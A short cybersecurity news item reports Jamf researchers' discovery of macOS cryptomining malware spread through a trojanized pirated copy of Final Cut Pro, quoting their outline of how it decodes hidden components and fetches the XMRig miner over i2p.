A new family of cryptojackers.
N2K logoFeb 23, 2023

New cryptomining malware takes aim at macOS systems.

A new family of cryptojackers.

Researchers at Jamf have discovered a new family of macOS cryptomining malware. The malware is evasive, and can sometimes pass security measures on machines running macOS Ventura.

Pirated versions of Final Cut Pro deliver cryptominers.

The malware is delivered via a malicious version of Final Cut Pro, which has been modified to install the XMRig miner in the background. The researchers discovered the software being offered on Pirate Bay:

“When the user double-clicks the Final Cut Pro icon, the trojanized executable runs, kicking off the shell calls to orchestrate the malware setup. Contained within the same executable are two large base64 blobs that are decoded via shell calls. Decoding both of these blobs results in two corresponding tar archives. One contains a working copy of Final Cut Pro. The other base64 encoded blob decodes to a customized executable responsible for handling the encrypted i2p traffic. 

“Once the embedded data has been decoded from base64 and unarchived, the resulting components are written to the /private/tmp/ directory as hidden files. After executing the i2p executable, the setup script uses curl over i2p to connect to the malicious author's web server and download the XMRig command line components that perform the covert mining. The version of Final Cut Pro that is launched and presented to the user is called from this directory and eventually removed from the disk.”

Apple devices are increasingly attractive for cryptojacking.

The researchers add that since cryptomining “requires a significant amount of processing power, it is likely that the ongoing advancements in Apple ARM processors will make macOS devices even more attractive targets for cryptojacking.”

It’s worth noting that users can avoid this particular malware by refraining from downloading pirated versions of software applications like Final Cut Pro.